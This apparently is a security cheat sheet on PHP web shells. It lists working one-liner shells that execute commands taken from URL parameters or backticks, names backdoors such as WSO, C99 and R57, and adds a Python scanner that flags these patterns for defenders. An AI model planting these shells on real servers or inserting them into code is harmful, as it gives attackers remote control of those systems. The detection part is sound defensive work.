Web Shells
A web shell is a malicious piece of code or script written in a server-side language such as PHP, ASP, Perl, Ruby, or Python and implanted on a targeted server. Once in place, it gives the attacker remote access to, or remote administrative control over, the server and its file system. Attackers introduce these scripts by exploiting common vulnerabilities, including remote file inclusion (RFI), local file inclusion (LFI), exposed administrative interfaces, and SQL injection.
You have access to different kinds of web shells on Kali here:
/usr/share/webshells
PHP Web Shells
Executing a single command:
<?php system("whoami"); ?>
Taking input from a URL parameter (e.g., shell.php?cmd=whoami):
<?php system($_GET['cmd']); ?>
The same as above, but using passthru:
<?php passthru($_GET['cmd']); ?>
To make shell_exec output the result, you need to echo it:
<?php echo shell_exec("whoami"); ?>
Note: exec() does not output the result unless you echo it, and it returns only the last line of the command's output. Thus, it is not very useful for capturing multi-line output:
<?php echo exec("whoami"); ?>
Alternatively, you can pass exec a second argument, an array that receives every line of output, and then print it:
<?php exec("ls -la", $array); print_r($array); ?>
A trick using preg_replace with the /e modifier, which evaluates the replacement string as PHP code (the /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this only works on PHP 5.x):
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
Using backticks to capture and display output:
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>
Or simply:
<?php echo `whoami`; ?>
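Every one-liner above relies on a small set of PHP constructs: the command-execution functions (system, passthru, shell_exec, exec), preg_replace with the /e modifier, and the backtick operator. That makes them a useful starting point for a defender triaging a web root. The following script is an added example, not code from this page or from the Kali webshells directory; it runs the same patterns over a handful of constructed PHP sources and rates each file. The file names, sample contents, and the "high"/"medium" labels are assumptions made for the illustration, and the rules are heuristics: a plain shell_exec call is common in legitimate code, while an execution function fed directly from $_GET/$_POST, a /e regex, or a backtick command is rarely so.

```python
from __future__ import annotations

import re

# Constructed sample files (hypothetical names and contents); one benign file
# and four that resemble the one-liners on this page.
SAMPLES = {
    "index.php": "<?php echo 'Hello'; ?>",
    "cmd.php": "<?php system($_GET['cmd']); ?>",
    "legacy.php": "<?php preg_replace('/.*/e', 'system(\"whoami\");', ''); ?>",
    "bt.php": "<?php echo `whoami`; ?>",
    "report.php": "<?php echo shell_exec('uptime'); ?>",
}

EXEC_FUNCS = r"(system|passthru|shell_exec|exec|popen|proc_open)"

# Each rule is (name, compiled regex). Order does not matter for matching.
RULES = [
    # Execution function whose first argument comes straight from the request.
    ("exec-function with request input",
     re.compile(r"\b" + EXEC_FUNCS + r"\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b")),
    # Any call to an execution function, regardless of argument.
    ("exec-function call",
     re.compile(r"\b" + EXEC_FUNCS + r"\s*\(")),
    # preg_replace whose pattern literal (using / delimiters) carries the e modifier.
    ("preg_replace with /e modifier",
     re.compile(r"preg_replace\s*\(\s*(['\"])/[^'\"]*/[a-zA-Z]*e[a-zA-Z]*\1")),
    # PHP backtick operator, which executes its contents as a shell command.
    ("backtick operator",
     re.compile(r"`[^`]+`")),
]

# Rules that by themselves warrant a closer look rather than a routine review.
STRONG_RULES = {
    "exec-function with request input",
    "preg_replace with /e modifier",
    "backtick operator",
}


def scan_source(source: str) -> list[str]:
    """Return the names of every rule that matches in one PHP source string."""
    return [name for name, pattern in RULES if pattern.search(source)]


def classify(findings: list[str]) -> str:
    """Map a list of matched rule names to a coarse triage label."""
    if not findings:
        return "clean"
    if any(name in STRONG_RULES for name in findings):
        return "high"
    return "medium"


def scan_files(files: dict[str, str]) -> dict[str, tuple[str, list[str]]]:
    """Scan a name -> source mapping; return only files with at least one finding."""
    results: dict[str, tuple[str, list[str]]] = {}
    for name, source in files.items():
        findings = scan_source(source)
        if findings:
            results[name] = (classify(findings), findings)
    return results


if __name__ == "__main__":
    for name, (label, findings) in scan_files(SAMPLES).items():
        print(f"{label:6} {name}: {', '.join(findings)}")
```

On the constructed samples, index.php produces no finding, report.php is rated "medium" for its hard-coded shell_exec call, and cmd.php, legacy.php and bt.php are rated "high". To run it against a real document root, replace SAMPLES with a mapping built from os.walk over *.php files; the rating is a triage aid only, and any "high" hit still needs a human to read the file.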
Web Shell Tools
WSO (Web Shell by oRb)
WSO is a popular and versatile PHP web shell that allows unauthorized access to web servers. It provides a wide range of functionalities, including executing system commands, managing files, and manipulating databases. WSO is known for its user-friendly interface, making it a preferred choice for attackers seeking to compromise web servers.
b374k
b374k is another PHP web shell that provides attackers with a powerful control interface over a compromised server. It offers features like file management, remote execution of commands, and more. b374k is known for its compact and inconspicuous design, making it challenging to detect.
C99
C99 is a well-known PHP backdoor script that enables unauthorized access to web servers. It allows attackers to upload and execute files, view system information, and interact with the server. C99 is widely used by cyber criminals to compromise websites and servers.
R57
R57 is a PHP backdoor script that has been around for some time. It grants attackers control over a web server, enabling them to execute arbitrary commands and manipulate files. R57 has been used in various hacking incidents and is considered a security threat.